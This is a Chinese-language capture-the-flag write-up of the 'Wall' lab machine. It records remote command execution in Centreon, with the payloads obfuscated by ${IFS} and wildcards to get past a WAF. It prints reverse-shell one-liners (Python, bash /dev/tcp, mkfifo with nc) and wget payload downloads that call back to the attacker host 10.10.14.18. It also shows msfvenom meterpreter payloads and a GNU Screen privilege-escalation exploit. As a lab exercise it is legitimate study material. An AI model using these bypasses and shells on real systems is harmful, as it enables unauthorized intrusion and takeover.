Wall-rce与绕过waf(下)

参考资料:绕过waf之命令执行

1
2
题外话:恐惧和自满是练习的天敌。
							——————《刻意练习》

访问http://10.10.10.157/centreon/main.php?p=60901&o=c&server_id=1

手动测试命令执行

(失败的)测试绕过waf

/bin/w??t${IFS}http://10.10.14.18/index.html

18 失败


/usr/bin/w??t${IFS}http://10.10.14.18:800/index.html%20%23 19

20 成功


/bin/nc.traditional -e 10.10.14.18 801

/bin/n?.???????????${IFS}-e${IFS}10.10.14.18${IFS}801%20%23

结果 /bin/n?.??????????? not found


/bin/ls /bin/bash

结果: /bin/ls: cannot access '/bin/bash%20%23': No such file or directory


pwd

结果: not found


wget -v

/usr/bin/w??t${IFS}-v%20%23

结果:

1
/usr/bin/wget: invalid option -- &#039;%&#039;<br>/usr/bin/wget: invalid option -- &#039;2&#039;<br>/usr/bin/wget: invalid option -- &#039;0&#039;<br>/usr/bin/wget: invalid option -- &#039;%&#039;<br>/usr/bin/wget: invalid option -- &#039;2&#039;<br>/usr/bin/wget: invalid option -- &#039;3&#039;<br>Usage: wget [OPTION]... [URL]...<br><br>Try `wget --help&#039; for more

本地开启802端口,准备好w.php——php反弹shell脚本。

1
2
3
wget http://10.10.14.18:802/w.php -P /tmp

/usr/bin/w??t${IFS}http://10.10.14.18:802/w.php${IFS}/tmp%20%23

21 成功


本地准备nc监听9000端口,等待反弹shell

1
2
3
4
5
6
chmod +x /tmp/w.php;./tmp/w.php

chmod${IFS}+x${IFS}/tmp/w.php;./tmp/w.php%20%23

结果:./tmp/w.php%20%23 not found
问题是,不知道wget把w.php保存到哪里去了。用/bin/ls也没有找到。

1
2
3
chmod${IFS}+x${IFS}/tmp/w.php;php${IFS}/tmp/w.php%20%23

Could not open input file: /tmp/w.php%20%23

ls被waf拦截,使用echo

echo${IFS}/tmp/w.php%20%23 成功


python –version

python${IFS}–version${IFS}%20%23

Python 2.7.15+


python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.0.0.1”,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

python${IFS}-c${IFS}’import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.10.14.18”,9000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’%20%23

403 forbidden


php –version

1
2
3
4
PHP 7.3.6-1+ubuntu18.04.1+deb.sury.org+1 (cli) (built: May 31 2019 11:06:48) ( NTS )<br>Copyright (c) 1997-2018 The PHP Group<br>Zend Engine v3.3.6, Copyright (c) 1998-2018 Zend Technologies<br>    with Zend OPcache v7.3.6-1+ubuntu18.04.1+deb.sury.org+1, Copyright (c) 1999-2018, by Zend Technologies<br><br></div><br/>]

php -r '$sock=fsockopen("10.10.14.18",9000);exec("/bin/sh -i <&3 >&3 2>&3");'
。。。

1
2
3
4
5
/bin/n?${IFS}-h%20%23

OpenBSD netcat (Debian patchlevel 1.187-1ubuntu0.1)<br>usage: nc [-46CDdFhklNnrStUuvZz] [-I length] [-i interval] [-M ttl]<br>  [-m minttl] [-O length] [-P proxy_username] [-p source_port]<br>  [-q seconds] [-s source] [-T keyword] [-V rtable] [-W recvlimit] [-w timeout]<br>  [-X proxy_protocol] [-x proxy_address[:port]]   [destination] [port]<br>Command Summary:<br>-4Use IPv4<br>-6Use IPv6<br>-bAllow broadcast<br>-CSend CRLF as line-ending<br>-DEnable the debug socket option<br>-dDetach from stdin<br>-FPass socket fd<br>-hThis help text<br>-I lengthTCP receive buffer length<br>-i intervalDelay interval for lines sent, ports scanned<br>-kKeep inbound sockets open for multiple connects<br>-lListen mode, for inbound connects<br>-M ttlOutgoing TTL / Hop Limit<br>-m minttlMinimum incoming TTL / Hop Limit<br>-NShutdown the network socket after EOF on stdin<br>-nSuppress name/port resolutions<br>-O lengthTCP send buffer length<br>-P proxyuserUsername for proxy authe

openbsd版本的nc,没有-e参数的那种

1
2
3
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

/bin/rm${IFS}/tmp/f;/usr/bin/mkfifo${IFS}/tmp/f;/bin/cat${IFS}/tmp/f|/bin/sh${IFS}-i${IFS}2>&1|/bin/n?${IFS}10.10.14.18${IFS}443${IFS}>/tmp/f%20%23

exp测试

11月17日更新,周末终于有空了。 为了简化手动操作的繁琐,我修改了一下exp。这是下载地址:https://github.com/Whale3070/ctf-coding/blob/master/centreon.py,使用方式是./centreon.py 要执行的命令

70

成功查看了wget的版本,1.19.4


./centreon.py "uname${IFS}-a"


1
2
3
echo 123
123


1
2
3
echo /b?n/?s
/bin/ls /bin/ps /bin/ss


1
2
3
echo /b?n/?c
/bin/nc


1
2
3
4
 /b?n/?c -h

OpenBSD netcat (Debian patchlevel 1.187-1ubuntu0.1)


1
2
3
4
5
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1| /b?n/?c 10.10.14.18 443 >/tmp/f
失败

/bin/bash -i >& /dev/tcp/10.10.14.18/443 0>&1


/bin/?s /

1

1
2
3
4
5
6
bin
boot
dev
etc
home
...

1
2
3
4
ls -al
-rw------- 1 shelby   shelby       33 Jul  4 01:22 /home/shelby/user.txt
-rw-r--r-- 1 www-data www-data   4089 Nov 18 06:53 /usr/local/centreon/filesGeneration/engine/1/centengine.DEBUG


wget http://10.10.14.18/w.php -P /tmp 2


1
2
3
/bin/?s /tmp"
w.php


1
2
3
4
chm\od +x /tmp/w.php

mode of &#039;/tmp/w.php&#039; changed from 0644 (rw-r--r--) to 0755 (rwxr-xr-x)


./centreon.py ip port “php /tmp/w.php” 3

提权

1
2
kali生成恶意载荷
msfvenom -p linux/x86/meterpreter_reverse_tcp LHOST=10.10.14.18 LPORT=445 -f elf -o w.elf

shell执行下载:

1
2
3
4
python -c 'import pty;pty.spawn("/bin/bash")'
wget http://10.10.14.18/w.elf -P /tmp
 chmod +x w.elf

kali执行监听:

1
2
3
4
5
msfconsole
handler -H 10.10.14.18 -P 445 -p linux/x86/meterpreter/reverse_tcp

wget http://10.10.14.18/w.elf -P /tmp

4

1
2
3
4
meterpreter执行的命令
ps
migrate 993
993    872    php-fpm7.1         x86_64  www-data         .

生成64位的payload

1
2
3
4
5
6
7
8
9
10
msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=10.10.14.18 LPORT=446 -f elf -o w64.elf

handler -H 10.10.14.18 -P 446 -p linux/x64/meterpreter/reverse_tcp

wget http://10.10.14.18/w64.elf -P /tmp
./w64.elf

use post/multi/recon/local_exploit_suggester
set SESSION 6
run

5

linuEnum.sh

wget http://10.10.14.18/l.sh -P /tmp chmod加权限并运行

发现口令

1
2
3
4
5
6
7
8
/etc/.htpasswd
admin:$apr1$7hIqRwgr$.QPU0yknBQRTf3WW9jfFp.

存在的用户
centreon、shelby、sysmonitor

/home/sysmonitor/.sudo_as_admin_successful
说明普通用户sysmonitor用sudo可以得到最高权限

password1

hash类型识别

MD5(APR) 6

尝试爆破和搜索hash,无结果。 7

html.zip

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
unzip html.zip
Archive:  html.zip
   creating: html/
 extracting: html/aa.php             
  inflating: html/index.html         
  inflating: html/panel.php          
   creating: html/monitoring/
  inflating: html/monitoring/index.html  
  inflating: html/monitoring/.htaccess 

cat .htaccess
AuthUserFile /etc/.htpasswd
AuthName "Protected area by the admin"
AuthType Basic
<Limit GET>
require valid-user
</Limit>

suid

1
2
3
4
5
6
7
8
9
10
11
12
13
14
cd /usr/lib/eject;
./dmcrypt-get-device
Usage: dmcrypt-get-device <device>

strings dmcrypt-get-device

---
cd /usr/lib/dbus-1.0/;file dbus-daemon-launch-helper

strings dbus-daemon-launch-helper
No memory to read directory entry
/usr/share/dbus-1/session.conf

./dbus-daemon-launch-helper

screen提权

1
2
3
4
GNU Screen 4.5.0 - Local Privilege Escalation                                          | exploits/linux/local/41154.sh

vi 41154.sh
:set ff=unix

8

1
2
wget  http://10.10.14.18/41154.sh /tmp
chomd +x 41154.sh;./41154.sh

9

总结

在migrate的时候,出错是什么原因?

1
2
3
migrate 36582
[-] Error running command migrate: NoMethodError undefined method `pid' for nil:NilClass

POST模块、后门 根据这篇文章,可以用模块迁移pid,无需使用ps然后再migrate pid

run post/windows/manage/migrate

提权脚本

# LinPEAS - Linux Privilege Escalation Awesome Script

时间所限,先这样吧。

suid priv

linux suid提权 & 渗透测试练习nebula